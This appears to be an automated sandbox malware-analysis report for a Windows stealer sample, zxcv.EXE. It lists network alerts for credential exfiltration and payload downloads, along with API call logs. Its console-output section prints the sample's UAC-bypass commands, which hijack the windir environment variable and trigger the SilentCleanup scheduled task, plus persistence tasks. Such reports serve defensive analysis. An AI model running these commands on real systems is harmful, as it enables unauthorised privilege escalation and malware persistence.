popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

zxcv.EXE

Gen1 Generic Malware Antivirus UPX Malicious Packer FTP Code injection DGA HTTP Socket Escalate priviledges Create Service KeyLogger Http API Internet API DNS PWS Steal credential Sniff Audio
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 19, 2021, 10:31 a.m. July 19, 2021, 10:55 a.m.
Size 1.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e0ee46172e94ab9aaed4f27dc2aab72a
SHA256 37ab9185008d63309815a1bc846dcc7067374a8833b49f2bfa6f96fd784f35e9
CRC32 55E422F2
ssdeep 24576:RZJWUupjq4JmaRO+I/2v+nQ1npPBmksd0e486EyO:RkpjfgChI/pahBoeeP
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49170 -> 195.201.225.248:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.102:49174 2400024 ET DROP Spamhaus DROP Listed Traffic Inbound group 25 Misc Attack
TCP 185.215.113.77:80 -> 192.168.56.102:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 34.89.184.90:80 -> 192.168.56.102:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 34.89.184.90:80 -> 192.168.56.102:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 34.89.184.90:80 -> 192.168.56.102:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.102:49173 2029137 ET MALWARE AZORult v3.3 Server Response M2 Malware Command and Control Activity Detected
TCP 192.168.56.102:49189 -> 185.215.113.77:80 2016858 ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) A Network Trojan was detected
TCP 192.168.56.102:49189 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49189 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.102:49246 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49189 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49188 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.102:49189 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.102:49189 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.102:49189 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.102:49247 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49248 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49249 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.102:49308 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.102:49286 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.102:49286 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49286 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49286 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49286 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.102:49309 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.102:49286 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.102:49331 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.102:49331 -> 185.215.113.77:80 2029236 ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil Malware Command and Control Activity Detected
TCP 192.168.56.102:49331 -> 185.215.113.77:80 2029846 ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49170
195.201.225.248:443 		C=US, O=Let's Encrypt, CN=R3 CN=telecut.in 1d:7b:94:0d:d6:f9:85:f3:66:74:d5:1d:98:0c:7a:28:5b:c0:62:44
TLSv1
192.168.56.102:49246
162.159.130.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.102:49247
162.159.130.233:443 		None None None
TLSv1
192.168.56.102:49248
162.159.130.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.102:49249
162.159.130.233:443 		None None None
TLSv1
192.168.56.102:49308
162.159.130.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.102:49309
162.159.130.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Access is denied.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Waiting for 3
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min C:\Users\Public\UKO.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min reg delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\zxcv.EXE
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Access is denied.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Updates\ddoAzF" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Cannot create a file when that file already exists.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Access is denied.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "2760" not found.
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589f68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589f68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589f68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589f68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589f68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589f68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a5e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a5e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a5e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00589b68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a6a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0058a728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x18fd
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6397
exception.address: 0x4018fd
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x18fe
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6398
exception.address: 0x4018fe
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x18ff
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6399
exception.address: 0x4018ff
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1900
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6400
exception.address: 0x401900
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1901
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6401
exception.address: 0x401901
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

